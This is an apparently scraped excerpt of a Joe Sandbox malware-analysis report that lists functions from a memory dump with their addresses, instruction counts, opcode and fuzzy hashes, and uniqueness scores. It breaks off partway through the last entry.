Function 00007FFA36263C8D, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e6cd0630faff91a2d27e09b86ec8c3c3d0e6d3fcd74ced06c42726e0401d4f
Instruction ID: 3263e1162ce1340049b04c47548a120c28ff65682461f415ab5a3b764d68fefe
Opcode Fuzzy Hash: e1e6cd0630faff91a2d27e09b86ec8c3c3d0e6d3fcd74ced06c42726e0401d4f
Instruction Fuzzy Hash: 34218C71D082598FEB609FA4C414BEDBAB0EF1A310F15617AD009A23C1DFB95944DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625077D, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87548beb5c86187edfe1442f559f9066731fddcc9d61614d9281a46b6878f16b
Instruction ID: f9470fdaf74c69a30f629c691141283317f4cadff7a02d331870443c7fe71b57
Opcode Fuzzy Hash: 87548beb5c86187edfe1442f559f9066731fddcc9d61614d9281a46b6878f16b
Instruction Fuzzy Hash: A3114F71C4920A8AF7219F948C45BFEB7B0AF12301F019536D2199A3C2DE3D6645EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36251103, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a4c303cab4310461a6c5d89c34d9a7d028c33f1f3b64dc21e2761ab66610b1
Instruction ID: 6ad8b943d389c29d8b696dd06e6ec5d9195d917e5bfa8b8538e0ec3ac90b58e7
Opcode Fuzzy Hash: a3a4c303cab4310461a6c5d89c34d9a7d028c33f1f3b64dc21e2761ab66610b1
Instruction Fuzzy Hash: 50118E3188E3C55FD7539BB048699E57FF4AF57210B0A40EBD489CB0A3D96D184ACB22

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258059, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b163c2f0c09f335708d00d1d92bfcf242656b5be95e81b03fd86da65ad0416
Instruction ID: 8909f39236ac441f6b0de95381c39fa5be6672abea3c1b53bea30a00852fc4a9
Opcode Fuzzy Hash: c4b163c2f0c09f335708d00d1d92bfcf242656b5be95e81b03fd86da65ad0416
Instruction Fuzzy Hash: 6E113C7091878C8FDB55EF68C885AE93FF0FF1A304F0541A6E849C7262DA78E850CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36261F87, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fcf83edeeab3c69a93c62ccde313f980fc7c4ecae11c897b2622c40b1d280aa
Instruction ID: da7b1f4652dae1a09b03c4bda5dbf25c72564a5a4b56dbd76059621c1308aa46
Opcode Fuzzy Hash: 0fcf83edeeab3c69a93c62ccde313f980fc7c4ecae11c897b2622c40b1d280aa
Instruction Fuzzy Hash: 23F0A205F1D86355F2A032BD3459DFD0E01CBA2AA0B15953AD48EC63D2DCCE248A7394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362634F3, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff027ac235c8c786e872ecd8798f9770aa4c6852d32d3304c24da80b4cb5227
Instruction ID: 2537fa61ea64e6fc63b50e1a5fc874cfa249ee7358e15343da615c9f0b8c089c
Opcode Fuzzy Hash: 4ff027ac235c8c786e872ecd8798f9770aa4c6852d32d3304c24da80b4cb5227
Instruction Fuzzy Hash: 49015E71D185098FEB54EB94C890DFD77B1FF6A311F51A13AC00EE3291DE7964419740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250EC0, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e7785f06c1f267772e34f41ab4ab102217fec4aeb184214c88ab8da2d65abe
Instruction ID: 4965325108e8ee9e4e41295cb7eb780235b81b18325b41e78b47e650f731dc45
Opcode Fuzzy Hash: 18e7785f06c1f267772e34f41ab4ab102217fec4aeb184214c88ab8da2d65abe
Instruction Fuzzy Hash: EF11052184E3C24FD3239BB04C656A07FB0AF07214F0A44EBD989CB1E3DA5D1859D762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36251383, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad8f22e4c20d51dbde20fa330d14b1e953c57d6b311a8250d4610901cb65102
Instruction ID: 14a80e9be32708f9df1012f50caad56182e87fd446ac095033df5b6e1742131b
Opcode Fuzzy Hash: 2ad8f22e4c20d51dbde20fa330d14b1e953c57d6b311a8250d4610901cb65102
Instruction Fuzzy Hash: 0901D436E0D2885FE711ABA89C18AF9BFA4EF17215F0910B7E60CC7293ED255914D711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362509B9, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5543255cbb3cbd2eda14624df0b207644986634a99493806b099a06f70a8677d
Instruction ID: 69b2e3c8468175f759c88e76bc88aee5b956d4f903b03a7f1d8c9bb401d97cb0
Opcode Fuzzy Hash: 5543255cbb3cbd2eda14624df0b207644986634a99493806b099a06f70a8677d
Instruction Fuzzy Hash: C811E070D4D28A8FF7219B94CC14BFEBBB0AF06310F059176C249962C2DE786644D782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36259550, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3c4d23da6b5ff4b0f23d62f167987b7b90a5e366f3328b4c4164ff08fe5bc8
Instruction ID: 9d19e0cbd5457506f0fed6e682d58ec78d9b36dc1bab19e45013c3c485d844c7
Opcode Fuzzy Hash: 9b3c4d23da6b5ff4b0f23d62f167987b7b90a5e366f3328b4c4164ff08fe5bc8
Instruction Fuzzy Hash: 96010230D0854E8FEB68DF84D8A4AEDB7B1EF4A311F11513AD40EE2280CE3A6841DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36257DB1, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e513d3051795f6d855f9fa4f77cc7e383f0bdb7c2aeb2ac62c37a0f6750221
Instruction ID: 1de47ec47bbebba02828f98d5a2023953382add4d9ae51069cc3a581d67e42c0
Opcode Fuzzy Hash: c7e513d3051795f6d855f9fa4f77cc7e383f0bdb7c2aeb2ac62c37a0f6750221
Instruction Fuzzy Hash: 10014F71949A8D8FDF94DF68C889AA97FE0FF29300F0144A6E509C7261DB34D590CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258F69, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172f1ea64fe21aff24a642ddf1a7f49080cfd05c5ca4bf3400c64c9fa96adabc
Instruction ID: 4cfe97662f9957c9ebab559f87ce4f70007fca604d537f88cee893544cf0f33a
Opcode Fuzzy Hash: 172f1ea64fe21aff24a642ddf1a7f49080cfd05c5ca4bf3400c64c9fa96adabc
Instruction Fuzzy Hash: FC01847090868D8FDB91EF58C849AA97FF1FF2A300F4140A6E80CC7262C678D454CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36263A35, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0241ebe23ccd78dab3f70f6438f6cc8e0c20fd75c4d1e94bb0557b66077f343
Instruction ID: f928ff2b8fda495e60c21a0bc17d9913522087c8d9aa673ff8a75ad6728dc7d1
Opcode Fuzzy Hash: a0241ebe23ccd78dab3f70f6438f6cc8e0c20fd75c4d1e94bb0557b66077f343
Instruction Fuzzy Hash: A5016931808A4D8FDF94EF28C888AA93BF0FF69300F0141A6E80CC3261DB74D990CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36261601, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6366e80e746489195cc63343e4ca5e9d9b4b5ad522f2a969ba1c36731b1c6b4d
Instruction ID: 8c634f864adcb8aa7170926eb2cd7f3955eb1cc99a35c7fe30a78c6cb454b4fb
Opcode Fuzzy Hash: 6366e80e746489195cc63343e4ca5e9d9b4b5ad522f2a969ba1c36731b1c6b4d
Instruction Fuzzy Hash: A701EC30D4D409CEEBA4DB98C485AFCB7B5EF5A300F50A0B5D04EE3282CE7578819B45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260350, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b444b17567e5d294fd3454c342545af1475ac310c88cd79554f55fee818eae4
Instruction ID: 618f223a37b5903266a088651df8b58938bcc4ca4653fddbdb49894ededf5f1b
Opcode Fuzzy Hash: 9b444b17567e5d294fd3454c342545af1475ac310c88cd79554f55fee818eae4
Instruction Fuzzy Hash: 09015E70E1450E8FE7A4EB94C8959FD77B2FF66301F409136C40DE7292DEA828119B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262BF5, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4c7758aedf9afa15826f43237eb6d4aa9aa56d64177fa396c1d312d0916b08
Instruction ID: 1fd86a4d73ce9c2bb5ea51a29e028b258e813eea6e841606574e5d2aaa64131e
Opcode Fuzzy Hash: dd4c7758aedf9afa15826f43237eb6d4aa9aa56d64177fa396c1d312d0916b08
Instruction Fuzzy Hash: 4C01D631C0E64D4FF7A4ABA444595FC7FA0EF26300F4694F6D40D962D3DDAEA5409345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36264089, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9756817f4ece0f33edbbf3b8e2611d4a9b0e2f81a9f7209d3c1fb20ffc0b55df
Instruction ID: 213e585af15e54004e1e0f4d886a6ebee7403f75df06fcc1aeed9cfe5e4c6d5d
Opcode Fuzzy Hash: 9756817f4ece0f33edbbf3b8e2611d4a9b0e2f81a9f7209d3c1fb20ffc0b55df
Instruction Fuzzy Hash: E6015E7080878D8FDB55EF2888495E93FB0FF2A300F4142A6E448C7251DA389554CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262D3D, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c49cea47ed36138aa16064c437fae43d2b1df301b3d828d605f00a287edbdab
Instruction ID: db4861b2ae56b720ebbf42cb11ebb9a2d9c479cf52532dd8018db69d3f46e663
Opcode Fuzzy Hash: 5c49cea47ed36138aa16064c437fae43d2b1df301b3d828d605f00a287edbdab
Instruction Fuzzy Hash: E501D67194D74E8FDB509F788C019EA37A0FF1A314F01453BE40D83182CB39A524CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36257C29, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681f934372aef8e4896bd6dbe231e51f8a33c39f4c05a7b111e2f278fde2352e
Instruction ID: c754f5608e51d717b78ab3b31c08b49421155fd22c50d22676e74f8e7dcb4501
Opcode Fuzzy Hash: 681f934372aef8e4896bd6dbe231e51f8a33c39f4c05a7b111e2f278fde2352e
Instruction Fuzzy Hash: 79015E7090CA8D8FDB91EF588888A997FF0FF29301F0540A6E508C72A2DB35D554CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250E5F, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f83354d4612523d098c87b8862a9742cafadcd4a021e5d237ccaba74e779bb
Instruction ID: e63fedfcf6dfb009ad0d65b64548ed868898ab075687c5dde034735d0519115c
Opcode Fuzzy Hash: 98f83354d4612523d098c87b8862a9742cafadcd4a021e5d237ccaba74e779bb
Instruction Fuzzy Hash: 0F01D070D1461E8FEBA4EBE4C858AACB7B1FF59300F41913AC40DE72A6DF7868409B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625EA35, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fce8b68822528e79a4b1fc2df6403b2d2ca0bae97c3a1f8eea930fd435f79e
Instruction ID: e56db64e7510a149c9b303bc214cb0d197fcaca71f48d295aa7134f5d5343273
Opcode Fuzzy Hash: e5fce8b68822528e79a4b1fc2df6403b2d2ca0bae97c3a1f8eea930fd435f79e
Instruction Fuzzy Hash: 44F0D171C0C68D8FEB64EFA48819AF9BFE0FF56310F0141BAE50CC2292DE295154C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262CF7, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e97aaa6d04ec27611922c80d401f7547d13291f7550dd3e217a7e25a899d1cb
Instruction ID: cd453390239f95361c76e714850d87a3fdd283295c3334286e35f0ed25905d21
Opcode Fuzzy Hash: 3e97aaa6d04ec27611922c80d401f7547d13291f7550dd3e217a7e25a899d1cb
Instruction Fuzzy Hash: 97F08C35E1864ECFEB51EFA8E4459EE37A0FF59315F004536E80D86680DA79A510DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250CF5, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c5f453631b1faf6f080e9241a8435f1e4ed50b2d3377083c99bfda2ab311fd
Instruction ID: 813091c9eee8be74b68983dfe8bb2b9daa352d6bd5b67400e2cb9a4ce78262df
Opcode Fuzzy Hash: 22c5f453631b1faf6f080e9241a8435f1e4ed50b2d3377083c99bfda2ab311fd
Instruction Fuzzy Hash: B3012CB1E0860A8FEB68DB94C860BBEB3B1FB49300F114539C51AD3291CE7969009B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2999f7f6660e45a5c943bc226ce2d41ced5a9c36ef2ce855ff21516cc9b11ea2
Instruction ID: 86fd625948f1e044bfd6b8d0cc899290bcb9ee81d8799b5c8939a911bef0fa58
Opcode Fuzzy Hash: 2999f7f6660e45a5c943bc226ce2d41ced5a9c36ef2ce855ff21516cc9b11ea2
Instruction Fuzzy Hash: 3BF06D31C1869C8FEB649FA888496A8BBA0EF16300F4155BAD90CC6292DA799550EB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262D1D, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3826fc69971ac92d46e8c36bc8cb7b630ab55f5fa33e42057f2eaa9285bf9d
Instruction ID: 3b2ff67627646a090e7599f9ef3f554bfc809a5d0df519ae43d7d755ddff79bd
Opcode Fuzzy Hash: 8b3826fc69971ac92d46e8c36bc8cb7b630ab55f5fa33e42057f2eaa9285bf9d
Instruction Fuzzy Hash: 0BF0F032E0C54C9EEBA0DBA8D8016ED77B0EF92300F016476E50CD3691CAB0A915E742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250D57, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction ID: 6a3e0940b45bfd1c9f9efd5ffc2a3be3c7f7957970d94375825f7420a666ec1a
Opcode Fuzzy Hash: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction Fuzzy Hash: 2401A870D4960A8BEB60DF94C844BFDB7B1EF16310F119535D519E3391DFB5A5409B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258E11, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d9aeaac37faeb83281e4063422107d598469121ca97aad43f2a65871ce34f7
Instruction ID: a2a6b6325b9ff157b7e926028ef11f6bce42a658b906320b8d5362f5e6dae028
Opcode Fuzzy Hash: 34d9aeaac37faeb83281e4063422107d598469121ca97aad43f2a65871ce34f7
Instruction Fuzzy Hash: C5F0B43180D78ECFEB759F5488422E97FA0FF56300F414579E90C86292CBB9E450CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362513BD, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10760637595c38c65e14b7ada0dab558d5947c105e80fdf24da379652fe740f2
Instruction ID: a2b9ef8fa2f5b6151b54eebd48e4cc2acd77f8ff01464eaf62a0eb616e87909c
Opcode Fuzzy Hash: 10760637595c38c65e14b7ada0dab558d5947c105e80fdf24da379652fe740f2
Instruction Fuzzy Hash: FBF0A431D0C3885FE7529F6888586A9BFB4AF17204F0910A7E50CC7293DE395954C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625E965, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15de1feadcc7f134628260099b93952cff333457677a8aedc8d69c3c6940d189
Instruction ID: 7a48cb5b0ec149424e6d7bcb5ebb37c88a2478c5aed39d83953b6c83f4a5512e
Opcode Fuzzy Hash: 15de1feadcc7f134628260099b93952cff333457677a8aedc8d69c3c6940d189
Instruction Fuzzy Hash: 3DF0A431C0C689CFEBA4EF9488567E9BFD0EF16200F0585B6E54DC22C3DE7954148706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258F80, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0963e87941f7490e79c84a192db914316ee60b5a5e588630e10c771d69202750
Instruction ID: 3e12cd289580e792d4f9f94b3c19489f1d656e23c18aa9a8b68227a79fcb3857
Opcode Fuzzy Hash: 0963e87941f7490e79c84a192db914316ee60b5a5e588630e10c771d69202750
Instruction Fuzzy Hash: 50F0173090890D8FDF90EF68C848AAA7BE1FF28300F5045A6E81CC3261CA74E5A0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362584F5, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ae4d443d572eb681f32e9df21e53d6e198abad9f664be9c9d2112be253535e
Instruction ID: d6262baf04a7a7a2772b4359c94777f6193506b6d2c837373765f9ce5dbc0a9c
Opcode Fuzzy Hash: a9ae4d443d572eb681f32e9df21e53d6e198abad9f664be9c9d2112be253535e
Instruction Fuzzy Hash: 7DF0173191894DCFEBD4EF68C848AAD3BE0FF69304F0048AAE80CD7260DA70E590CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250680, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd5f8efa576b7521aca5a996e811ad64ef2afc3c74b8fdebd46b015270c5032
Instruction ID: 09c82a2ba0d9365adb8ce9dbfe45937cf1373a01803d92eb121c22f6e73d8bba
Opcode Fuzzy Hash: 6cd5f8efa576b7521aca5a996e811ad64ef2afc3c74b8fdebd46b015270c5032
Instruction Fuzzy Hash: E9F0F031C0874E8EF7789BA898087B8BBE0AF86310F00A476D10CC2680CE3A10D4C602

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262D20, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27377eb321883ce8848e3003c79f6dab67008054eb6125847afb4408b0c2e434
Instruction ID: 0c1af96024d8456043f939039271dd46f095834ec5a50306b93aad5992193eb6
Opcode Fuzzy Hash: 27377eb321883ce8848e3003c79f6dab67008054eb6125847afb4408b0c2e434
Instruction Fuzzy Hash: 9FF09031D0C54D9EEB90EBA898016ED77B0EF52340F016476E50C96192DFB4B914EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625F146, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a7aa91cfca98e09784b0d7b0c169b12aa039cf94094b62ff8b011291eaf0b9
Instruction ID: c676181d09cecf2c763ffe2100d516e7a0fb855fc9952a8966d63f3a3eed7ae3
Opcode Fuzzy Hash: e9a7aa91cfca98e09784b0d7b0c169b12aa039cf94094b62ff8b011291eaf0b9
